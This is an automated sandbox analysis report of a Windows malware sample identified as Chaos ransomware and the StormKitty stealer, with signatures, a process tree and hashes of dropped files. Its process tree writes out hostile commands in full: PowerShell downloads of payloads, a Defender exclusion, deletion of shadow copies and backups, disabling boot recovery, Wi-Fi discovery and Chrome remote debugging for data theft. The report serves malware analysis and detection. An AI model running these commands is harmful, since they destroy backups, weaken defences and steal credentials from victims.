Analysis

  • max time kernel
    25s
  • max time network
    25s
  • platform
    windows11-21h2_x64
  • resource
    win11-20250314-en
  • resource tags

    arch:x64arch:x86image:win11-20250314-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    22/03/2025, 02:31

General

  • Target

    nig.exe

  • Size

    56KB

  • MD5

    827c7f426f6d6770d127ee96a29ad6db

  • SHA1

    0ed96a36e037baef30f459cc54a50db51ca0e9d9

  • SHA256

    90e7162a771d6d4ad5e46f38611fec16d2dee5583d628ef7bf205e727e6ebff4

  • SHA512

    c2cba465541b8f5ecd7e8fd48bcbf7a02c97279b7c7edb10601d8d7646b28bb30059470248164a13122fd65de2a8318d4f337739dac326ea871d870bd1d8b782

  • SSDEEP

    1536:U4dJooh0Wa0aer344Jw/ytUqVS5EkIijQ1fTNHmn5aHc:U4dzVTaer344JzthRZijQ1J6

Malware Config

Signatures

  • Chaos

    Ransomware family first seen in June 2021.

  • Chaos Ransomware 2 IoCs
  • Chaos family
  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 2 IoCs
  • Stormkitty family
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Deletes backup catalog 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Disables Task Manager via registry modification
  • Downloads MZ/PE file 2 IoCs
  • Uses browser remote debugging 2 TTPs 5 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Drops startup file 3 IoCs
  • Executes dropped EXE 3 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

  • Drops desktop.ini file(s) 64 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Windows directory 1 IoCs
  • Hide Artifacts: Ignore Process Interrupts 1 TTPs 2 IoCs

    Command interpreters often include specific commands/flags that ignore errors and other hangups.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Checks SCSI registry key(s) 3 TTPs 4 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Interacts with shadow copies 3 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies registry class 1 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Runs net.exe
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 63 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\nig.exe
    "C:\Users\Admin\AppData\Local\Temp\nig.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2376
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4FA6.tmp\4FA7.tmp\4FA8.bat C:\Users\Admin\AppData\Local\Temp\nig.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:5904
      • C:\Windows\system32\net.exe
        net session
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:568
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 session
          4⤵
            PID:1448
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Hide Artifacts: Ignore Process Interrupts
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3468
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -NoProfile -ExecutionPolicy Bypass -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iwr -Uri \"https://github.com/nfdsafnsdl/login/releases/download/V1/build.exe\" -OutFile \"C:\Users\Admin\AppData\Local\Temp\build.exe\" -ErrorAction Stop"
          3⤵
          • Blocklisted process makes network request
          • Downloads MZ/PE file
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:548
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -NoProfile -ExecutionPolicy Bypass -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iwr -Uri \"https://github.com/nfdsafnsdl/login/releases/download/V1/kernelv.exe\" -OutFile \"C:\Users\Admin\AppData\Local\Temp\kernelv.exe\" -ErrorAction Stop"
          3⤵
          • Blocklisted process makes network request
          • Downloads MZ/PE file
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3336
        • C:\Users\Admin\AppData\Local\Temp\build.exe
          "C:\Users\Admin\AppData\Local\Temp\build.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3368
          • C:\Users\Admin\AppData\Roaming\svchost.exe
            "C:\Users\Admin\AppData\Roaming\svchost.exe"
            4⤵
            • Drops startup file
            • Executes dropped EXE
            • Drops desktop.ini file(s)
            • Sets desktop wallpaper using registry
            • Modifies registry class
            • Suspicious behavior: AddClipboardFormatListener
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:5196
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete
              5⤵
                PID:4060
                • C:\Windows\system32\vssadmin.exe
                  vssadmin delete shadows /all /quiet
                  6⤵
                  • Interacts with shadow copies
                  PID:1916
                • C:\Windows\System32\Wbem\WMIC.exe
                  wmic shadowcopy delete
                  6⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2416
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
                5⤵
                  PID:5272
                  • C:\Windows\system32\bcdedit.exe
                    bcdedit /set {default} bootstatuspolicy ignoreallfailures
                    6⤵
                    • Modifies boot configuration data using bcdedit
                    PID:1284
                  • C:\Windows\system32\bcdedit.exe
                    bcdedit /set {default} recoveryenabled no
                    6⤵
                    • Modifies boot configuration data using bcdedit
                    PID:1496
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
                  5⤵
                    PID:5640
                    • C:\Windows\system32\wbadmin.exe
                      wbadmin delete catalog -quiet
                      6⤵
                      • Deletes backup catalog
                      PID:3828
                  • C:\Windows\system32\NOTEPAD.EXE
                    "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\readme.txt
                    5⤵
                    • Opens file in notepad (likely ransom note)
                    PID:1284
              • C:\Users\Admin\AppData\Local\Temp\kernelv.exe
                "C:\Users\Admin\AppData\Local\Temp\kernelv.exe"
                3⤵
                • Executes dropped EXE
                • Accesses Microsoft Outlook profiles
                • System Location Discovery: System Language Discovery
                • Checks processor information in registry
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                • outlook_office_path
                • outlook_win_path
                PID:1040
                • C:\Windows\SysWOW64\cmd.exe
                  "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                  4⤵
                  • System Location Discovery: System Language Discovery
                  • System Network Configuration Discovery: Wi-Fi Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:3720
                  • C:\Windows\SysWOW64\chcp.com
                    chcp 65001
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:5100
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh wlan show profile
                    5⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    • System Network Configuration Discovery: Wi-Fi Discovery
                    PID:2720
                  • C:\Windows\SysWOW64\findstr.exe
                    findstr All
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:4972
                • C:\Windows\SysWOW64\cmd.exe
                  "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
                  4⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:5452
                  • C:\Windows\SysWOW64\chcp.com
                    chcp 65001
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:5668
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh wlan show networks mode=bssid
                    5⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:1324
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
                  4⤵
                  • Uses browser remote debugging
                  • Drops file in Windows directory
                  • Enumerates system info in registry
                  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of WriteProcessMemory
                  PID:4788
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff9039dcf8,0x7fff9039dd04,0x7fff9039dd10
                    5⤵
                      PID:752
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2028,i,4203278597748872447,1038679663510519725,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2024 /prefetch:2
                      5⤵
                        PID:4296
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1924,i,4203278597748872447,1038679663510519725,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2108 /prefetch:11
                        5⤵
                          PID:6000
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2392,i,4203278597748872447,1038679663510519725,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2548 /prefetch:13
                          5⤵
                            PID:4764
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3252,i,4203278597748872447,1038679663510519725,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3316 /prefetch:1
                            5⤵
                            • Uses browser remote debugging
                            PID:1236
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3260,i,4203278597748872447,1038679663510519725,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3336 /prefetch:1
                            5⤵
                            • Uses browser remote debugging
                            PID:1132
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4220,i,4203278597748872447,1038679663510519725,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4240 /prefetch:9
                            5⤵
                            • Uses browser remote debugging
                            PID:3436
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=3780,i,4203278597748872447,1038679663510519725,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4724 /prefetch:1
                            5⤵
                            • Uses browser remote debugging
                            PID:3984
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -NoProfile -ExecutionPolicy Bypass -Command "Remove-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"
                        3⤵
                        • Hide Artifacts: Ignore Process Interrupts
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3896
                  • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
                    "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
                    1⤵
                      PID:3700
                    • C:\Windows\system32\vssvc.exe
                      C:\Windows\system32\vssvc.exe
                      1⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4824
                    • C:\Windows\system32\wbengine.exe
                      "C:\Windows\system32\wbengine.exe"
                      1⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:5004
                    • C:\Windows\System32\vdsldr.exe
                      C:\Windows\System32\vdsldr.exe -Embedding
                      1⤵
                        PID:5052
                      • C:\Windows\System32\vds.exe
                        C:\Windows\System32\vds.exe
                        1⤵
                        • Checks SCSI registry key(s)
                        PID:3344

                      Network

                      MITRE ATT&CK Enterprise v15

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • C:\Users\Admin\2012_x64_1_vcRuntimeAdditional_x64.log

                        Filesize

                        1B

                        MD5

                        d1457b72c3fb323a2671125aef3eab5d

                        SHA1

                        5bab61eb53176449e25c2c82f172b82cb13ffb9d

                        SHA256

                        8a8de823d5ed3e12746a62ef169bcf372be0ca44f0a1236abc35df05d96928e1

                        SHA512

                        ca63c07ad35d8c9fb0c92d6146759b122d4ec5d3f67ebe2f30ddb69f9e6c9fd3bf31a5e408b08f1d4d9cd68120cced9e57f010bef3cde97653fed5470da7d1a0

                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

                        Filesize

                        40B

                        MD5

                        bd83426a5a006b0d097ace6d84bf5e11

                        SHA1

                        45684f5112db4d6eaeb4c0b98e95740b4217e275

                        SHA256

                        1bf1428c2039a63d2026cb8d09950654432e801d1caba36f8bc55864ff825059

                        SHA512

                        ed71318f822ee32bcb90bc0c4cd32fc3643ce86356d84a5a02b18e4fd054bfcf9f44426eeb1d6128723e72928f0fb1afbe9ad18488a4260fa7e44d24f83f00a4

                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\000003.log

                        Filesize

                        87B

                        MD5

                        e4a639b9d8bf7a90cc97bb4e05a36753

                        SHA1

                        676facdabf06e5f014e95218bfc02b8c18c39284

                        SHA256

                        79da0e95b23e5777bee595201fead887021d71ddaffa79dac8d5cf03a646b8cd

                        SHA512

                        4a254245e0af42a2a86647ed24301f4f82a72c0dedad67df32317c2acdb8a7f2e5db8336871611419776e6a1cc1c35933cc5f4cb16648b51b6a401a14087d104

                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                        Filesize

                        2B

                        MD5

                        d751713988987e9331980363e24189ce

                        SHA1

                        97d170e1550eee4afc0af065b78cda302a97674c

                        SHA256

                        4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                        SHA512

                        b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\000003.log

                        Filesize

                        3KB

                        MD5

                        6e2bcfaf47b332399c3fcf6774a7fe9b

                        SHA1

                        e6d156eaf48764a89b6eb5e25272e704086e3ba0

                        SHA256

                        e6ee1c3fa01e8d7ae631d4a934e67ee4f6ca0d15d9ab3ba756e4bffdd4194a51

                        SHA512

                        dc11435dc55db67797065079c24e77fd9056f047f7fe2ce0bf9c4f80a26e93ee52edd932e08adf08fc9092c970528355061ff1ba13221fb827843c23393e0c63

                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\000003.log

                        Filesize

                        289B

                        MD5

                        541c42f1c98b3e1b011d22eba854e707

                        SHA1

                        db30188de1f22e3077e7044be1386a5d0ecaed9d

                        SHA256

                        0768e811c51ac61a8e573ac6b53f89dbb1d89eb2fcf62536a9a5f730329c584b

                        SHA512

                        47828c1b40deb8d37d6ff4fc8f7673fbb59b40e07f54f0fa4121b91941160134c251e20f7f28f7ee5185f3c8aee2b7e95a1bef573bc64c68912016accbe90604

                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\000003.log

                        Filesize

                        17KB

                        MD5

                        1d1444a35ab945cc5cd43887689a002b

                        SHA1

                        ad76adc914078bb8ff067515b9a18dc635daa59b

                        SHA256

                        c72c7a0bc499b0affb5334b373edc40e956b33627d8df2fa8184278dacfc97af

                        SHA512

                        aca17df89a533b901b510143f1e4ff5975161bb43a0a5ab7e996604bc53e8349db13503391b8df21798246dd40a9bd80144c977cbf27bd4b34a19b443cec7997

                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\000003.log

                        Filesize

                        1KB

                        MD5

                        348c65af2e7832b8b500f9f1db959ded

                        SHA1

                        c005fc6664c3870862b28f157b513256b8a01bda

                        SHA256

                        ae57b5c76f9d937b2e623c2d4b23b927002a83d971979756e40b9620807c7f54

                        SHA512

                        e2620a5e38cf33066bba203b1eabf11f68501805f394e4e8733f906f3de39e29dfb97ea0859284be94ce103291e8e5bc610e373fb5a2bd75e65c2508b4d81571

                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GrShaderCache\data_0

                        Filesize

                        44KB

                        MD5

                        a453dba98e162e1a8c61b7883a45c36a

                        SHA1

                        42c7cb30f5b448b64ed54c1dce06b0a14484682c

                        SHA256

                        501b1914978cde251053bee1de1543b7cb75bbc06d890bb2f2c2e1d89742c929

                        SHA512

                        fc4ad5b0e038dbfb30c78260714ad85b1eb23345575dcd8412db8f21d7eee73b59e908977bc035bcb98286a187df59c2a7b097ed882248209aa92983c9db76a4

                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GrShaderCache\data_1

                        Filesize

                        264KB

                        MD5

                        add3a9b1c7c77dc466fdd84581a2e738

                        SHA1

                        268559a68f8ffb9e8bf790040b451635badba3bf

                        SHA256

                        6137915ac06df1a2898ed66f974070a9b0736fc6cbc24193071fae4640edfbc3

                        SHA512

                        79cfe98350f11079e3329673d76638f056a866d1ad9ba2ae5386bdf3c97b33091f1e4b393859f92709cc2b3e5210a73c892074eea80d0378751318c9b4e8ce01

                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GrShaderCache\data_3

                        Filesize

                        4.0MB

                        MD5

                        78918979d60e1107c3e3b9c0381d57ba

                        SHA1

                        a5221dec24b540d2837cc2c68988f923ef42a723

                        SHA256

                        17de248ed651849ab9da62d891a867e636c4822d887bb1189e949f9201fe9f07

                        SHA512

                        c464c5b4eb96357cb7c71d37d945f217dae80e1ef70f9b79edb471abf2edb289b59720979d3a9ed6ac2620241c1e66471ed7025ad48295e85b7b05893512f593

                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                        Filesize

                        80KB

                        MD5

                        60e4ab20371c9caae1dfe02d61d65be4

                        SHA1

                        c3a63dbedcc25a74900dbdbf0f7e5a8d7097fa28

                        SHA256

                        71500f8b04cc161783164b980a5724ffe273f936c53c91a7c3a463330b1f392a

                        SHA512

                        5a0b2f8f9586763de08e375127c1051f9d2a87b69321cbc6d294636edeb0948f09d432606945627b39cac62bea149c44a2f8addf3b288433da4c0fceb33363d1

                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\build.exe.log

                        Filesize

                        226B

                        MD5

                        4ae344179932dc8e2c6fe2079f9753ef

                        SHA1

                        60eacc624412b1f34809780769e3b212f138ea9c

                        SHA256

                        3063de3898a9b34e19f8cf0beeec2b8bd6bd05896b52abd73f4703d07b8a7cd4

                        SHA512

                        fadfe2b83f1af8fdc50430325f69d6172d2c1e889ca3800b3b83e5535d5970c32e9a176b48563275a0630d56c96d9f88df148fd6b2d281f0fc58129e5f4dba19

                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                        Filesize

                        2KB

                        MD5

                        627073ee3ca9676911bee35548eff2b8

                        SHA1

                        4c4b68c65e2cab9864b51167d710aa29ebdcff2e

                        SHA256

                        85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

                        SHA512

                        3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                        Filesize

                        944B

                        MD5

                        1a9fa92a4f2e2ec9e244d43a6a4f8fb9

                        SHA1

                        9910190edfaccece1dfcc1d92e357772f5dae8f7

                        SHA256

                        0ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888

                        SHA512

                        5d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                        Filesize

                        1KB

                        MD5

                        34f1137282ba9d0b004c435fe5ca95ab

                        SHA1

                        bf5d59871e1854a077c26a4627ae7fae1035de28

                        SHA256

                        04eb31df02db6bdab1abdf7a07c0906fd4c0654e1af9e350ec4e4556b88203c0

                        SHA512

                        117d8665037099921f80bb7dc94e3b4c799f16f4ee794286970041aa68935b50f3af2170d66ad0616474b0aee92e4cef02d2b88a2e0f365182e2fa9b25e9235f

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                        Filesize

                        1KB

                        MD5

                        d057703d5a9ab9259469130b501e63f4

                        SHA1

                        4ab7ee5f3fc41ddd9a0df6e2833dee335825db5d

                        SHA256

                        a59409f996c24a5093a52a1a9deafaf674dade18bae41a6c2ef4b615870a71a9

                        SHA512

                        032a463d998befa5dcd7faaf18521685a481a52bb7d79ea1a046ef0e250875f95898fcf6a1ed58e3c41ba8830d50f8da33f8e57892892b328934c056449e944a

                      • C:\Users\Admin\AppData\Local\Temp\212.102.63.147.zip

                        Filesize

                        412KB

                        MD5

                        bbf0af655e945e96818a7d02b80b90a4

                        SHA1

                        7e5a6f96fa0922c28d1168fbe787cc751628b254

                        SHA256

                        2566c09283122b0f2b4aa3f318bf0d028eaed9d4651687ef2d4bf6db11d5cc92

                        SHA512

                        4a15a7a696e1bd49335e533a592bf461e3154b7a9e6d54ebc03b570436576826a7b381a2a63fa462717b5ba238915857a7e7006c2f2931f1b3dd5ae5305f4bd9

                      • C:\Users\Admin\AppData\Local\Temp\212.102.63.147\Browsers\Firefox\FirefoxBookmarks.txt

                        Filesize

                        81B

                        MD5

                        ea511fc534efd031f852fcf490b76104

                        SHA1

                        573e5fa397bc953df5422abbeb1a52bf94f7cf00

                        SHA256

                        e5fe7f327ae62df007bd1117aa7f522dbbcd371ec67953f66d786424cb1d7995

                        SHA512

                        f7d8e575a2332b0fbd491b5e092b7ed6b0942a5165557fcc5d215d873b05103aa6ba01843133871c1c7ac81b10182a15895be49885c98d1a379dd55f88004fae

                      • C:\Users\Admin\AppData\Local\Temp\212.102.63.147\DesktopScreenshot.png

                        Filesize

                        412KB

                        MD5

                        53fa4e58d53321f11ca26bf3c5422fa8

                        SHA1

                        219bc77dfdccdfe10056e399876f26e94e5b67c6

                        SHA256

                        95f29efe74bbfb0108c1d16a1f5f3de7fc11a67044cb025cca04dcd1bfbd0362

                        SHA512

                        4e74d4a69f213f9a26160ee79372453cf6bfe38a056353e6a29a037031c0a1a80b71c8eb8707167a3752f664d80b1e1f74064c1b87d0cde5122a788c512b31aa

                      • C:\Users\Admin\AppData\Local\Temp\212.102.63.147\System\Info.txt

                        Filesize

                        353B

                        MD5

                        d118cc3c54f632f6cdeb0a7ef0d5330d

                        SHA1

                        897e910acbc99c6bee07773000b7f578585445b0

                        SHA256

                        321a3a6db6c9f8f9d008da12b3adf29fc584764dba327ab0ac8116480f5e0da3

                        SHA512

                        aedf6cab6fb19a11a05b300b2dfe3158e87d50aea8dd831ff0a7cea6dd5faf52eed1025c713bfa27c8287ad995f053c0cfaeba7fccfaaec7f3c841e6eea1290c

                      • C:\Users\Admin\AppData\Local\Temp\212.102.63.147\System\Process.txt

                        Filesize

                        4KB

                        MD5

                        6a6ebe968cb917b4d97c610eb4b1bad6

                        SHA1

                        b537fd67dd0c289c5a76da108ac513d4fba5ec54

                        SHA256

                        0c385600e6cf4b968daaa6be1cdffc77cc672a07c946e787b5da019057c1c566

                        SHA512

                        04f12faa890f1f617ed267726d7eefa95453312c84bd0acbcba50eebf2309b1fc9edbbd3821fc6d9527a643517641395062fcaab8561aff0c011510d22116e40

                      • C:\Users\Admin\AppData\Local\Temp\212.102.63.147\System\Process.txt

                        Filesize

                        4KB

                        MD5

                        7ec34ba6308d1668ae109e6baf64dac4

                        SHA1

                        1eb8783ef219e550e3b3cd35caf1b53877d27f70

                        SHA256

                        0c604c16892debf6b3e818cd934872b1d5ad56379328ac1228a4faf30b441528

                        SHA512

                        054a51776b3539223aa3850490f667777876a383f269c6c6934f473787fe8283456cf18ada5c97b9cb98971c086a3a50f349253ad5dba8e9db1d83544c2fe53d

                      • C:\Users\Admin\AppData\Local\Temp\4FA6.tmp\4FA7.tmp\4FA8.bat

                        Filesize

                        2KB

                        MD5

                        1c935ef28fdfd394b770d945d7f04d76

                        SHA1

                        29e251c3c40ce4ad1b2984bf26b444aa045d9b21

                        SHA256

                        aa58e1df5882878a44687853f47d10b655c3fe888ec20fb99446305f5d38c681

                        SHA512

                        a9e60f2ac4aec15a3ba0a95df224449f64777a027357792247dd597529542e79128aec996c89ff86a1654911b4b763c577d3c3d2f38c59b02b280b8ad824e7e1

                      • C:\Users\Admin\AppData\Local\Temp\Extra.zip

                        Filesize

                        2KB

                        MD5

                        7ef073b0530a5f5f0a290251115505db

                        SHA1

                        8ca599fc2da1e19ce1a7f2d7fde58995b6c95fb3

                        SHA256

                        9ebe7f8e7e63355e8e10477bb123d8de9b87d3c495b632bcbcba36c121c1946d

                        SHA512

